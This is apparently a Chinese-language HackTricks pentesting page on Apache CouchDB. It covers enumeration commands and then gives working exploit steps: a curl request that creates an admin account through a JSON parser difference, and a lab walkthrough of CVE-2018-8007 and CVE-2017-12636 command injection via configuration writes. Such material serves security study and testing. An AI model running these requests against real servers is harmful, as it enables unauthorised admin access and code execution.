从零开始学习AWS黑客技术,成为专家 ! 其他支持HackTricks的方式:
如果您想看到您的公司在HackTricks中做广告 或下载PDF格式的HackTricks ,请查看
加入 💬 关注 我们的Twitter 🐦 。
通过向
基本信息
CouchDB 是一种多功能且强大的面向文档的数据库 ,它使用键-值映射 结构在每个文档 内组织数据。文档内的字段可以表示为键/值对、列表或映射 ,提供了数据存储和检索的灵活性。
在CouchDB中,每个存储的文档 都被分配一个文档级别的唯一标识符 (_id)。此外,对数据库进行的每次修改并保存都会被分配一个修订号 (_rev)。这个修订号允许有效地跟踪和管理更改 ,便于在数据库内轻松检索和同步数据。
**默认端口:**5984(http),6984(https)
复制 PORT STATE SERVICE REASON
5984/tcp open unknown syn-ack 自动枚举
复制 nmap -sV --script couchdb-databases,couchdb-stats -p <PORT> <IP>
msf> use auxiliary/scanner/couchdb/couchdb_enum 手动枚举
横幅
这会向已安装的CouchDB实例发出GET请求。回复应该类似于以下内容之一:
复制 {"couchdb":"Welcome","version":"0.10.1"}
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}} 信息枚举
/_active_tasks
/_all_dbs
/_cluster_setup
/_db_updates _global_changes数据库才能使用此端点。
/_membership cluster_nodes的集群中的节点。字段all_nodes显示此节点知道的所有节点,包括作为集群一部分的节点。
/_scheduler/jobs
/_scheduler/docs completed和failed状态下。对于每个文档,它返回文档ID、数据库、复制ID、源和目标等信息。
/_scheduler/docs/{replicator_db}
/_scheduler/docs/{replicator_db}/{docid}
/_node/{node-name} /_node/{node-name}端点可用于确认处理请求的服务器的Erlang节点名称。在访问/_node/_local以检索此信息时,这是最有用的。
/_node/{node-name}/_stats _stats资源返回包含运行服务器统计信息的JSON对象。字面字符串_local用作本地节点名称的别名,因此对于所有统计URL,可以将{node-name}替换为_local,以与本地节点的统计信息交互。
/_node/{node-name}/_system _system资源返回包含运行服务器各种系统级统计信息的JSON对象。您可以使用_local作为{node-name}来获取当前节点信息。
/_node/{node-name}/_restart
/_uuids
/_reshard
数据库列表
复制 curl -X GET http://IP:5984/_all_dbs 如果该请求以401未经授权的方式回应,则您需要一些有效的凭据来访问数据库:
复制 curl -X GET http://user:password@IP:5984/_all_dbs 这是一个couchdb的响应示例 ,当您有足够的权限 来列出数据库时(这只是一个数据库列表):
复制 ["_global_changes","_metadata","_replicator","_users","passwords","simpsons"] 数据库信息
您可以访问数据库名称来获取一些数据库信息(如文件数量和大小):
复制 curl http://IP:5984/<database>
curl http://localhost:5984/simpsons
#Example response:
{"db_name":"simpsons","update_seq":"7-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQmPoiQFIJlkD1bHjE-dA0hdPFgdAz51CSB19WB1jHjU5bEASYYGIAVUOp8YtQsgavfjtx-i9gBE7X1i1D6AqAX5KwsA2vVvNQ","sizes":{"file":62767,"external":1320,"active":2466},"purge_seq":0,"other":{"data_size":1320},"doc_del_count":0,"doc_count":7,"disk_size":62767,"disk_format_version":6,"data_size":2466,"compact_running":false,"instance_start_time":"0"} 文档列表
列出数据库中的每个条目
复制 curl -X GET http://IP:5984/{dbname}/_all_docs
curl http://localhost:5984/simpsons/_all_docs
#Example response:
{"total_rows":7,"offset":0,"rows":[
{"id":"f0042ac3dc4951b51f056467a1000dd9","key":"f0042ac3dc4951b51f056467a1000dd9","value":{"rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329"}},
{"id":"f53679a526a868d44172c83a61000d86","key":"f53679a526a868d44172c83a61000d86","value":{"rev":"1-7b8ec9e1c3e29b2a826e3d14ea122f6e"}},
{"id":"f53679a526a868d44172c83a6100183d","key":"f53679a526a868d44172c83a6100183d","value":{"rev":"1-e522ebc6aca87013a89dd4b37b762bd3"}},
{"id":"f53679a526a868d44172c83a61002980","key":"f53679a526a868d44172c83a61002980","value":{"rev":"1-3bec18e3b8b2c41797ea9d61a01c7cdc"}},
{"id":"f53679a526a868d44172c83a61003068","key":"f53679a526a868d44172c83a61003068","value":{"rev":"1-3d2f7da6bd52442e4598f25cc2e84540"}},
{"id":"f53679a526a868d44172c83a61003a2a","key":"f53679a526a868d44172c83a61003a2a","value":{"rev":"1-4446bfc0826ed3d81c9115e450844fb4"}},
{"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}}
]} 读取文档
读取数据库中文档的内容:
复制 curl -X GET http://IP:5984/{dbname}/{id}
curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9
#Example response:
{"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"} 由于Erlang和JavaScript JSON解析器之间的差异,您可以使用以下请求创建一个具有凭据 hacktricks:hacktricks 的管理员用户 :
复制 curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json" CouchDB RCE
Erlang Cookie 安全概述
关于端口4369突出了一个关键的安全警报。如果此端口在互联网或任何不受信任的网络上可访问,系统的安全性将严重依赖于一个称为"cookie"的唯一标识符。这个cookie充当了一个保护措施。例如,在给定的进程列表中,可能会观察到名为"monster"的cookie,表明其在系统安全框架中的操作角色。
复制 www-data@canape:/$ ps aux | grep couchdb
root 744 0.0 0.0 4240 640 ? Ss Sep13 0:00 runsv couchdb
root 811 0.0 0.0 4384 800 ? S Sep13 0:00 svlogd -tt /var/log/couchdb
homer 815 0.4 3.4 649348 34524 ? Sl Sep13 5:33 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/b 通过修改 local.ini 利用 CVE-2018-8007
最近披露的漏洞 CVE-2018-8007 影响了 Apache CouchDB,揭示了利用该漏洞需要对 local.ini 文件具有写入权限。尽管由于安全限制,这并不直接适用于初始目标系统,但为了探索目的,对 local.ini 文件进行了修改以授予写入访问权限。下面提供了详细的步骤和代码示例,演示了该过程。
首先,通过确保 local.ini 文件可写来准备环境,并通过列出权限进行验证:
复制 root@canape:/home/homer/etc# ls -l
-r--r--r-- 1 homer homer 18477 Jan 20 2018 default.ini
-rw-rw-rw- 1 homer homer 4841 Sep 14 17:39 local.ini
-r--r--r-- 1 root root 4841 Sep 14 14:30 local.ini.bk
-r--r--r-- 1 homer homer 1345 Jan 14 2018 vm.args 为了利用这个漏洞,执行一个curl命令,针对local.ini中的cors/origins配置。这会在[os_daemons]部分注入一个新的origin以及额外的命令,旨在执行任意代码:
复制 www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/cors/origins' -H "Accept: application/json" -H "Content-Type: application/json" -d "0xdf\n\n[os_daemons]\ntestdaemon = /usr/bin/touch /tmp/0xdf" 随后的验证显示在 local.ini 中注入的配置,将其与备份进行对比以突出显示更改:
复制 root@canape:/home/homer/etc# diff local.ini local.ini.bk
119,124d118
< [cors]
< origins = 0xdf
< [os_daemons]
< test_daemon = /usr/bin/touch /tmp/0xdf 最初,预期的文件(/tmp/0xdf)不存在,表明注入的命令尚未执行。进一步调查发现,与CouchDB 相关的进程正在运行,其中一个可能会执行注入的命令:
复制 root@canape:/home/homer/bin# ps aux | grep couch 通过终止已识别的CouchDB进程并允许系统自动重新启动,触发了注入命令的执行,通过之前丢失的文件的存在得到确认:
复制 root@canape:/home/homer/etc# kill 711
root@canape:/home/homer/etc# ls /tmp/0xdf
/tmp/0xdf 这项探索确认了在特定条件下利用CVE-2018-8007的可行性,特别是需要对local.ini文件具有可写访问权限。提供的代码示例和操作步骤为在受控环境中复制利用漏洞提供了清晰指南。
使用local.ini写权限探索CVE-2017-12636
探讨了一种名为CVE-2017-12636的漏洞,它通过CouchDB进程实现代码执行,尽管特定配置可能会阻止其利用。尽管在线上有许多可用的概念验证(POC)参考,但需要调整才能利用CouchDB版本2上的漏洞,与通常被瞄准的版本1.x不同。初始步骤涉及验证CouchDB版本并确认预期的查询服务器路径不存在。
复制 curl http://localhost:5984
curl http://0xdf:df@localhost:5984/_config/query_servers/ 为了适应CouchDB 2.0版本,使用了新的路径:
复制 curl 'http://0xdf:df@localhost:5984/_membership'
curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers 尝试添加和调用新的查询服务器时遇到了与权限相关的错误,如下输出所示:
复制 curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' 进一步调查发现local.ini文件存在权限问题,无法写入。通过使用root或homer访问权限修改文件权限,就可以继续进行:
复制 cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b
chmod 666 /home/homer/etc/local.ini 随后尝试添加查询服务器成功,响应中没有错误消息。通过文件比较确认成功修改了 local.ini 文件:
复制 curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' 接下来的过程包括创建一个数据库和一个文档,然后尝试通过自定义视图映射到新添加的查询服务器来执行代码:
复制 curl -X PUT 'http://0xdf:df@localhost:5984/df'
curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}'
curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}' Shodan
参考资料